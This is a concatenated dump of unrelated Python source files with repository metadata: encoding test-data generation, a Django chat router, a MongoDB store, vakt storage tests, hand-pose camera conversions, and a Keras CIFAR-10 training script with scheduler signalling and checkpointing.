euc_kr_out_ref_file = open("src/test_data/euc_kr_out_ref.txt", "w")
euc_kr_out_file.write(TEST_HEADER)
euc_kr_out_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x41
euc_kr_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
euc_kr_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
euc_kr_out_file.close()
euc_kr_out_ref_file.close()
index = indexes["gb18030"]
gb18030_in_file = open("src/test_data/gb18030_in.txt", "w")
gb18030_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x41
gb18030_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
gb18030_in_file.close()
gb18030_in_ref_file = open("src/test_data/gb18030_in_ref.txt", "w")
gb18030_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
gb18030_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 190
trail += 0x40 if trail < 0x3F else 0x41
if trail < 0x80:
gb18030_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
gb18030_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
gb18030_in_ref_file.close()
gb18030_out_file = open("src/test_data/gb18030_out.txt", "w")
gb18030_out_ref_file = open("src/test_data/gb18030_out_ref.txt", "w")
gb18030_out_file.write(TEST_HEADER)
gb18030_out_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
if pointer == 6555:
continue
code_point = index[pointer]
if code_point:
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x41
gb18030_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
gb18030_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
gb18030_out_file.close()
gb18030_out_ref_file.close()
index = indexes["big5"]
big5_in_file = open("src/test_data/big5_in.txt", "w")
big5_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 157)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x62
big5_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
big5_in_file.close()
big5_two_characters = {
1133: u"\u00CA\u0304",
1135: u"\u00CA\u030C",
1164: u"\u00EA\u0304",
1166: u"\u00EA\u030C",
}
big5_in_ref_file = open("src/test_data/big5_in_ref.txt", "w")
big5_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
if pointer in big5_two_characters.keys():
big5_in_ref_file.write((u"%s\n" % big5_two_characters[pointer]).encode("utf-8"))
continue
code_point = index[pointer]
if code_point:
big5_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 157
trail += 0x40 if trail < 0x3F else 0x62
if trail < 0x80:
big5_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
big5_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
big5_in_ref_file.close()
prefer_last = [
0x2550,
0x255E,
0x2561,
0x256A,
0x5341,
0x5345,
]
pointer_for_prefer_last = []
for code_point in prefer_last:
for i in xrange(len(index) - 1, -1, -1):
candidate = index[i]
if candidate == code_point:
pointer_for_prefer_last.append(i)
break
big5_out_file = open("src/test_data/big5_out.txt", "w")
big5_out_ref_file = open("src/test_data/big5_out_ref.txt", "w")
big5_out_file.write(TEST_HEADER)
big5_out_ref_file.write(TEST_HEADER)
for pointer in range(((0xA1 - 0x81) * 157), len(index)):
code_point = index[pointer]
if code_point:
if code_point in prefer_last:
if pointer != pointer_for_prefer_last[prefer_last.index(code_point)]:
continue
else:
if pointer != index.index(code_point):
continue
(lead, trail) = divmod(pointer, 157)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x62
big5_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
big5_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
big5_out_file.close()
big5_out_ref_file.close()
index = indexes["jis0212"]
jis0212_in_file = open("src/test_data/jis0212_in.txt", "w")
jis0212_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 94)
lead += 0xA1
trail += 0xA1
jis0212_in_file.write("\x8F%s%s\n" % (chr(lead), chr(trail)))
jis0212_in_file.close()
jis0212_in_ref_file = open("src/test_data/jis0212_in_ref.txt", "w")
jis0212_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
jis0212_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
jis0212_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
jis0212_in_ref_file.close()
(codepage_begin, codepage_end) = read_non_generated("../codepage/src/lib.rs")
codepage_file = open("../codepage/src/lib.rs", "w")
codepage_file.write(codepage_begin)
codepage_file.write("""
// Instead, please regenerate using generate-encoding-data.py
/// Supported code page numbers in estimated order of usage frequency
static CODE_PAGES: [u16; %d] = [
""" % len(code_pages))
for code_page in code_pages:
codepage_file.write(" %d,\n" % code_page)
codepage_file.write("""];
/// Encodings corresponding to the code page numbers in the same order
static ENCODINGS: [&'static Encoding; %d] = [
""" % len(code_pages))
for code_page in code_pages:
name = encodings_by_code_page[code_page]
codepage_file.write(" &%s_INIT,\n" % to_constant_name(name))
codepage_file.write("""];
""")
codepage_file.write(codepage_end)
codepage_file.close()
(codepage_test_begin, codepage_test_end) = read_non_generated("../codepage/src/tests.rs")
codepage_test_file = open("../codepage/src/tests.rs", "w")
codepage_test_file.write(codepage_test_begin)
codepage_test_file.write("""
// Instead, please regenerate using generate-encoding-data.py
#[test]
fn test_to_encoding() {
assert_eq!(to_encoding(0), None);
""")
for code_page in code_pages:
codepage_test_file.write(" assert_eq!(to_encoding(%d), Some(%s));\n" % (code_page, to_constant_name(encodings_by_code_page[code_page])))
codepage_test_file.write("""}
#[test]
fn test_from_encoding() {
""")
for name in preferred:
if code_pages_by_encoding.has_key(name):
codepage_test_file.write(" assert_eq!(from_encoding(%s), Some(%d));\n" % (to_constant_name(name), code_pages_by_encoding[name]))
else:
codepage_test_file.write(" assert_eq!(from_encoding(%s), None);\n" % to_constant_name(name))
codepage_test_file.write("""}
""")
codepage_test_file.write(codepage_test_end)
codepage_test_file.close()
subprocess.call(["cargo", "fmt"])
| [
"[email protected]"
] | |
318b1eb3d3c2cefce03b58798d8e9617e20f6b8b | 2a4bb0307d903678c3b51d1e2c8b7a53ee4ae26e | /backend/chat/api/v1/urls.py | 99a41c839549f4bde6227190e323d88b69862120 | [] | no_license | crowdbotics-apps/came2mind-20661 | 37835754c6b3fae6920b3f43bd5e9e1b824548f6 | 5eaed44b4b116ab89f9ae5f5ce4e2f314ae33172 | refs/heads/master | 2022-12-24T08:45:31.081668 | 2020-09-25T03:15:03 | 2020-09-25T03:15:03 | 298,455,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .viewsets import (
MessageViewSet,
ThreadMemberViewSet,
MessageActionViewSet,
ThreadActionViewSet,
ForwardedMessageViewSet,
ThreadViewSet,
)
router = DefaultRouter()
router.register("forwardedmessage", ForwardedMessageViewSet)
router.register("thread", ThreadViewSet)
router.register("threadaction", ThreadActionViewSet)
router.register("messageaction", MessageActionViewSet)
router.register("message", MessageViewSet)
router.register("threadmember", ThreadMemberViewSet)
urlpatterns = [
path("", include(router.urls)),
]
| [
"[email protected]"
] | |
ec9e9967a9d35ecb9c137b87d2b0304e54b3bf9f | eefb06b0d8c8c98c1e9cfc4c3852d5c453eb5429 | /data/input/anchor/make-magic/core/store.py | 6c8c1ab79e867d22aa00a08806097d60a5d46324 | [] | no_license | bopopescu/pythonanalyzer | db839453bde13bf9157b76e54735f11c2262593a | 8390a0139137574ab237b3ff5fe8ea61e8a0b76b | refs/heads/master | 2022-11-22T02:13:52.949119 | 2019-05-07T18:42:52 | 2019-05-07T18:42:52 | 282,079,884 | 0 | 0 | null | 2020-07-23T23:46:09 | 2020-07-23T23:46:08 | null | UTF-8 | Python | false | false | 2,808 | py | #! /usr/bin/env python
'''persistant storage of state data
We need some way to keep track of Tasks that are being worked on,
the state of items etc. It would be even cooler if that data was
to hang around when the process was gone.
'''
try: import pymongo
except: pass # allow import where noone is using the MongoStore
import config
import random
class MongoStore(object):
'''persistant mongodb store'''
def __init__(self):
self.connection = pymongo.Connection(config.mongodb_server,config.mongodb_port)
self.db = self.connection[config.mongodb_database]
def get_tasks(self):
return [name for name in self.db.collection_names() if 'system.' not in name]
def new_task(self, uuid, items, metadata=None):
if metadata == None: metadata = {}
metadata['uuid'] = uuid
metadata['metadata'] = True
self.db[uuid].create_index('name')
self.db[uuid].create_index('metadata')
self.db[uuid].insert(items)
self.db[uuid].insert(metadata)
def _noid(self, item):
if item is None or '_id' not in item: return item
del item['_id']
return item
def item(self, uuid, name):
'''get a specific item for a task'''
return self._noid( self.db[uuid].find_one({'name': name}) )
def items(self, uuid):
'''get all the items for a task'''
# ALL THE THINGS!
return [self._noid(item) for item in self.db[uuid].find({'name': {'$exists': True},'metadata': {'$exists': False}})]
def metadata(self, uuid):
'''get metadata for a task'''
metadata = self.db[uuid].find_one({'metadata': {'$exists': True}})
return self._noid(metadata)
def update_item(self, uuid, name, updatedict, existingstate={}):
'''updates an item similar to dict.update()
if 'existingdict' is supplied, the update will only succeed if
the items in existingdict match what is in the item already
returns the contents of the item after the attempt is made.
It is up to the caller to check if the update worked or failed.
'''
matchon = dict(existingstate)
matchon['name'] = name
self.db[uuid].update(matchon, {'$set': updatedict})
return self.item(uuid, name)
def update_metadata(self, uuid, updatedict, existingstate={}):
'''updates a metadata similar to dict.update()
if 'existingdict' is supplied, the update will only succeed if
the items in existingdict match what is in the metadata already
returns the contents of the metadata after the attempt is made.
It is up to the caller to check if the update worked or failed.
'''
matchon = dict(existingstate)
matchon['metadata'] = {'$exists': True}
self.db[uuid].update(matchon, {'$set': updatedict})
return self.metadata(uuid)
def delete_task(self, uuid):
'''delete a task, all it's items, and all it's metadata
This is not recoverable.
'''
self.db[uuid].drop()
# Define the default Store here
Store = MongoStore
| [
"[email protected]"
] | |
4ca0d26c31143eecceec45ee9e2ea01a0526ef94 | 19da8356b07108c640ca107729a183670829a694 | /tests/storage/test_observable.py | 6fc02760b8a477088fb6b63a3e5b6bb7a9068638 | [
"Apache-2.0"
] | permissive | kolotaev/vakt | 2ebbc59f7ece8a3ad27ee9e77b3a9cb62509df6b | 3a669d058b64c9c0aa75aa72745049d25635d292 | refs/heads/master | 2023-05-25T13:11:12.988351 | 2023-04-12T11:16:03 | 2023-04-12T11:16:03 | 115,222,029 | 154 | 27 | Apache-2.0 | 2023-05-22T21:37:17 | 2017-12-23T21:10:41 | Python | UTF-8 | Python | false | false | 3,548 | py | import pytest
from vakt.storage.memory import MemoryStorage
from vakt.storage.observable import ObservableMutationStorage
from ..helper import CountObserver
from vakt import Policy, Inquiry
class TestObservableMutationStorage:
@pytest.fixture()
def factory(self):
def objects_factory():
mem = MemoryStorage()
st = ObservableMutationStorage(mem)
observer = CountObserver()
st.add_listener(observer)
return st, mem, observer
return objects_factory
def test_add(self, factory):
st, mem, observer = factory()
p1 = Policy(1)
p2 = Policy(2)
p3 = Policy(3)
st.add(p1)
st.add(p2)
assert 2 == observer.count
assert 2 == len(list(mem.retrieve_all()))
assert 2 == len(list(st.retrieve_all()))
st.add(p3)
assert 3 == observer.count
def test_get(self, factory):
st, mem, observer = factory()
p1 = Policy('a')
st.add(p1)
assert 'a' == st.get('a').uid
assert 'a' == mem.get('a').uid
assert 1 == observer.count
assert None is st.get('b')
assert None is mem.get('b')
assert 1 == observer.count
def test_update(self, factory):
st, mem, observer = factory()
p1 = Policy('a')
st.add(p1)
p1.uid = 'b'
st.update(p1)
assert 'b' == list(mem.retrieve_all())[0].uid
assert 'b' == list(st.retrieve_all())[0].uid
assert 2 == observer.count
p1.uid = 'c'
st.update(p1)
assert 3 == observer.count
def test_delete(self, factory):
st, mem, observer = factory()
p1 = Policy('a')
st.add(p1)
st.delete('a')
assert [] == list(mem.retrieve_all())
assert [] == list(st.retrieve_all())
assert 2 == observer.count
st.delete('a')
assert [] == list(mem.retrieve_all())
assert [] == list(st.retrieve_all())
assert 3 == observer.count
def test_retrieve_all(self, factory):
st, mem, observer = factory()
p1 = Policy('a')
st.add(p1)
assert 'a' == list(mem.retrieve_all())[0].uid
assert 'a' == list(st.retrieve_all())[0].uid
assert 1 == observer.count
assert 'a' == list(mem.retrieve_all(batch=2))[0].uid
assert 'a' == list(st.retrieve_all(batch=2))[0].uid
assert 1 == observer.count
assert 'a' == list(mem.retrieve_all(5))[0].uid
assert 'a' == list(st.retrieve_all(5))[0].uid
assert 1 == observer.count
def test_get_all(self, factory):
st, mem, observer = factory()
p1 = Policy('a')
st.add(p1)
assert 'a' == list(mem.get_all(5, 0))[0].uid
assert 'a' == list(st.get_all(5, 0))[0].uid
assert 1 == observer.count
st.get_all(9, 0)
st.get_all(888, 0)
assert 1 == observer.count
def test_find_for_inquiry(self, factory):
st, mem, observer = factory()
inq = Inquiry(action='get', subject='foo', resource='bar')
p1 = Policy('a')
p2 = Policy('b')
st.add(p1)
st.add(p2)
mem_found = list(mem.find_for_inquiry(inq))
assert [p1, p2] == mem_found or [p2, p1] == mem_found
st_found = list(st.find_for_inquiry(inq))
assert [p1, p2] == st_found or [p2, p1] == st_found
assert 2 == observer.count
st.find_for_inquiry(inq)
st.find_for_inquiry(inq)
assert 2 == observer.count
| [
"[email protected]"
] | |
2eda2a6491ee50990066f2822c92a82bbc2bf67d | 1fe8d4133981e53e88abf633046060b56fae883e | /venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py | a1937c921b8c52bf1875287a5e3e4aecfbfc8217 | [] | no_license | Akira331/flask-cifar10 | 6c49db8485038731ce67d23f0972b9574746c7a7 | 283e7a2867c77d4b6aba7aea9013bf241d35d76c | refs/heads/master | 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:31d32b42c854a00b62bce6763a16a669094ee5a52103e00e97a238c43ef7234c
size 894
| [
"[email protected]"
] | |
fb14339c19c7c98a958d8c1a2f148ae76f946893 | 6268a19db5d7806b3a91d6350ec2777b3e13cee6 | /old_stuff/code/mlcv-exp_01/src/utils/fpha.py | e9b04c766cd61753ea10d92891cc0009d77a9fe8 | [] | no_license | aaronlws95/phd_2019 | 3ae48b4936f039f369be3a40404292182768cf3f | 22ab0f5029b7d67d32421d06caaf3e8097a57772 | refs/heads/master | 2023-03-22T14:38:18.275184 | 2021-03-21T11:39:29 | 2021-03-21T11:39:29 | 186,387,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,871 | py | from pathlib import Path
import numpy as np
from src import ROOT
# ========================================================
# CONSTANTS
# ========================================================
ORI_WIDTH = 1920
ORI_HEIGHT = 1080
REORDER_IDX = [0, 1, 6, 7, 8, 2, 9,
10, 11, 3, 12, 13, 14, 4,
15, 16, 17, 5, 18, 19, 20]
CAM_EXTR = [[0.999988496304, -0.00468848412856,
0.000982563360594, 25.7],
[0.00469115935266, 0.999985218048,
-0.00273845880292, 1.22],
[-0.000969709653873, 0.00274303671904,
0.99999576807, 3.902],
[0, 0, 0, 1]]
FOCAL_LENGTH_X_COLOR = 1395.749023
FOCAL_LENGTH_Y_COLOR = 1395.749268
X0_COLOR = 935.732544
Y0_COLOR = 540.681030
CAM_INTR_COLOR = [[FOCAL_LENGTH_X_COLOR, 0, X0_COLOR],
[0, FOCAL_LENGTH_Y_COLOR, Y0_COLOR],
[0, 0, 1]]
FOCAL_LENGTH_X_DEPTH = 475.065948
FOCAL_LENGTH_Y_DEPTH = 475.065857
X0_DEPTH = 315.944855
Y0_DEPTH = 245.287079
CAM_INTR_DEPTH = [[FOCAL_LENGTH_X_DEPTH, 0, X0_DEPTH],
[0, FOCAL_LENGTH_Y_DEPTH, Y0_DEPTH],
[0, 0, 1]]
BBOX_NORMUVD = [397, 361, 1004.3588]
BBSIZE = 260
INV_CAM_EXTR = [[0.99998855624950122256, 0.0046911597684540387191,
-0.00096970967236367877683, -25.701645303388132272],
[-0.0046884842637616731197, 0.99998527559956268165,
0.0027430368219501163773, -1.1101913203320408265],
[0.00098256339938933108913, -0.0027384588555197885184,
0.99999576732453258074, -3.9238944436608977969]]
# ========================================================
# XYZ UVD CONVERSION
# ========================================================
def uvd2xyz_depth(skel_uvd):
""" UVD space to XYZ space for depth """
skel_xyz = np.empty_like(skel_uvd).astype("float32")
fx0 = FOCAL_LENGTH_X_DEPTH
fy0 = FOCAL_LENGTH_Y_DEPTH
skel_xyz[...,0] = (skel_uvd[..., 0]-X0_DEPTH)/fx0*skel_uvd[..., 2]
skel_xyz[...,1] = (skel_uvd[..., 1]-Y0_DEPTH)/fy0*skel_uvd[..., 2]
skel_xyz[...,2] = skel_uvd[...,2]
return skel_xyz
def xyz2uvd_depth(skel_xyz):
""" XYZ space to UVD space for depth """
skel_uvd = np.empty_like(skel_xyz).astype("float32")
skel_uvd[..., 0] = X0_DEPTH + \
FOCAL_LENGTH_X_DEPTH*(skel_xyz[..., 0]/skel_xyz[..., 2])
skel_uvd[..., 1] = Y0_DEPTH + \
FOCAL_LENGTH_Y_DEPTH*(skel_xyz[..., 1]/skel_xyz[..., 2])
skel_uvd[..., 2] = skel_xyz[..., 2]
return skel_uvd
def xyz2uvd_color(skel_xyz):
""" XYZ space to UVD space for color """
skel_uvd = np.empty_like(skel_xyz).astype("float32")
ccs_x = CAM_EXTR[0][0]*skel_xyz[..., 0] + \
CAM_EXTR[0][1]*skel_xyz[..., 1] + \
CAM_EXTR[0][2]*skel_xyz[..., 2] + CAM_EXTR[0][3]
ccs_y = CAM_EXTR[1][0]*skel_xyz[..., 0] + \
CAM_EXTR[1][1]*skel_xyz[..., 1] + \
CAM_EXTR[1][2]*skel_xyz[..., 2] + CAM_EXTR[1][3]
ccs_z = CAM_EXTR[2][0]*skel_xyz[..., 0] + \
CAM_EXTR[2][1]*skel_xyz[..., 1] + \
CAM_EXTR[2][2]*skel_xyz[..., 2] + CAM_EXTR[2][3]
skel_uvd[..., 0] = X0_COLOR+FOCAL_LENGTH_X_COLOR*(ccs_x/ccs_z)
skel_uvd[..., 1] = Y0_COLOR+FOCAL_LENGTH_Y_COLOR*(ccs_y/ccs_z)
skel_uvd[..., 2] = ccs_z
return skel_uvd
def uvd2xyz_color(skel_uvd):
""" UVD space to XYZ space for color """
ccs_z = skel_uvd[..., 2]
ccs_x = ((skel_uvd[..., 0]-X0_COLOR)/FOCAL_LENGTH_X_COLOR)*ccs_z
ccs_y = ((skel_uvd[..., 1]-Y0_COLOR)/FOCAL_LENGTH_Y_COLOR)*ccs_z
skel_xyz = np.empty_like(skel_uvd).astype("float32")
skel_xyz[..., 0] = INV_CAM_EXTR[0][0]*ccs_x + \
INV_CAM_EXTR[0][1]*ccs_y + \
INV_CAM_EXTR[0][2]*ccs_z + INV_CAM_EXTR[0][3]
skel_xyz[..., 1] = INV_CAM_EXTR[1][0]*ccs_x + \
INV_CAM_EXTR[1][1]*ccs_y + \
INV_CAM_EXTR[1][2]*ccs_z + INV_CAM_EXTR[1][3]
skel_xyz[..., 2] = INV_CAM_EXTR[2][0]*ccs_x + \
INV_CAM_EXTR[2][1]*ccs_y + \
INV_CAM_EXTR[2][2]*ccs_z + INV_CAM_EXTR[2][3]
return skel_xyz
def xyz2ccs_color(skel_xyz):
""" XYZ space to camera coordinate space for color """
skel_ccs = np.empty_like(skel_xyz).astype("float32")
skel_ccs[..., 0] = CAM_EXTR[0][0]*skel_xyz[..., 0] + \
CAM_EXTR[0][1]*skel_xyz[..., 1] + \
CAM_EXTR[0][2]*skel_xyz[..., 2] + CAM_EXTR[0][3]
skel_ccs[..., 1] = CAM_EXTR[1][0]*skel_xyz[..., 0] + \
CAM_EXTR[1][1]*skel_xyz[..., 1] + \
CAM_EXTR[1][2]*skel_xyz[..., 2] + CAM_EXTR[1][3]
skel_ccs[..., 2] = CAM_EXTR[2][0]*skel_xyz[..., 0] + \
CAM_EXTR[2][1]*skel_xyz[..., 1] + \
CAM_EXTR[2][2]*skel_xyz[..., 2] + CAM_EXTR[2][3]
return skel_ccs
def ccs2uvd_color(skel_ccs):
""" Camera coordinate space to UVD for color """
skel_uvd = np.empty_like(skel_ccs).astype("float32")
skel_uvd[..., 0] = X0_COLOR + \
FOCAL_LENGTH_X_COLOR*(skel_ccs[..., 0]/skel_ccs[..., 2])
skel_uvd[..., 1] = Y0_COLOR + \
FOCAL_LENGTH_Y_COLOR*(skel_ccs[..., 1]/skel_ccs[..., 2])
skel_uvd[..., 2] = skel_ccs[..., 2]
return skel_uvd
def uvd2ccs_color(skel_uvd):
""" UVD space to camera coordinate space for color """
skel_ccs = np.empty_like(skel_uvd).astype("float32")
fx0 = FOCAL_LENGTH_X_COLOR
fy0 = FOCAL_LENGTH_Y_COLOR
skel_ccs[..., 2] = skel_uvd[..., 2]
skel_ccs[..., 0] = ((skel_uvd[..., 0] - X0_COLOR)/fx0)*skel_uvd[..., 2]
skel_ccs[..., 1] = ((skel_uvd[..., 1]- Y0_COLOR)/fy0)*skel_uvd[..., 2]
return skel_ccs
def ccs2xyz_color(skel_ccs):
""" Camera coordinate space to XYZ for color """
skel_xyz = np.empty_like(skel_ccs).astype("float32")
skel_xyz[..., 0] = INV_CAM_EXTR[0][0]*skel_ccs[..., 0] + \
INV_CAM_EXTR[0][1]*skel_ccs[..., 1] + \
INV_CAM_EXTR[0][2]*skel_ccs[..., 2] + INV_CAM_EXTR[0][3]
skel_xyz[..., 1] = INV_CAM_EXTR[1][0]*skel_ccs[..., 0] + \
INV_CAM_EXTR[1][1]*skel_ccs[..., 1] + \
INV_CAM_EXTR[1][2]*skel_ccs[..., 2] + INV_CAM_EXTR[1][3]
skel_xyz[..., 2] = INV_CAM_EXTR[2][0]*skel_ccs[..., 0] + \
INV_CAM_EXTR[2][1]*skel_ccs[..., 1] + \
INV_CAM_EXTR[2][2]*skel_ccs[..., 2] + INV_CAM_EXTR[2][3]
return skel_xyz
# ========================================================
# GET LABELS
# ========================================================
def get_action_dict():
action_dict = {}
action_list_dir = 'First_Person_Action_Benchmark/action_object_info.txt'
with open(Path(ROOT)/action_list_dir, 'r') as f:
lines = f.readlines()[1:]
for l in lines:
l = l.split(' ')
action_dict[int(l[0]) - 1] = l[1]
return action_dict
def get_obj_dict():
obj_dict = []
action_list_dir = 'First_Person_Action_Benchmark/action_object_info.txt'
with open(Path(ROOT)/action_list_dir, 'r') as f:
lines = f.readlines()[1:]
for l in lines:
l = l.split(' ')
obj_dict.append(l[2])
obj_dict = np.unique(obj_dict)
obj_dict = {v: k for v, k in enumerate(obj_dict)}
return obj_dict | [
"[email protected]"
] | |
85c95a3b601684446b03adad7c6161cdc1be33ba | b2d3bd39b2de8bcc3b0f05f4800c2fabf83d3c6a | /examples/pwr_run/checkpointing/final/high_overhead/job58.py | 61a74ad5fb05cb5f37bbeece917ae726b6d199bf | [
"MIT"
] | permissive | boringlee24/keras_old | 3bf7e3ef455dd4262e41248f13c04c071039270e | 1e1176c45c4952ba1b9b9e58e9cc4df027ab111d | refs/heads/master | 2021-11-21T03:03:13.656700 | 2021-11-11T21:57:54 | 2021-11-11T21:57:54 | 198,494,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,328 | py | """
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.mobilenet_v2 import MobileNetV2
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 256
args_lr = 0.002
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_final4/' + job_name + '*'
total_epochs = 7
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
time.sleep(100)
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
base_model = MobileNetV2(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(128, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
#model.add(layers.Dense(64, activation='relu'))
#model.add(layers.Dropout(0.5))
#model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
if epoch_waste_time > 0:
send_signal.send(args.node, 10002, message)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_final4/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
message = job_name + ' checkpoint'
send_signal.send(args.node, 10002, message)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch, first_epoch_start
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
if epoch == starting_epoch and args.resume:
first_epoch_start = time.time()
message = job_name + ' d_end'
send_signal.send(args.node, 10002, message)
elif epoch == starting_epoch:
first_epoch_start = time.time()
if epoch == starting_epoch:
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
def on_epoch_end(self, epoch, logs=None):
if epoch == starting_epoch:
first_epoch_time = int(time.time() - first_epoch_start)
message = job_name + ' 1st_epoch ' + str(first_epoch_time)
send_signal.send(args.node, 10002, message)
progress = round((epoch+1) / round(total_epochs/2), 2)
message = job_name + ' completion ' + str(progress)
send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| [
"[email protected]"
] | |
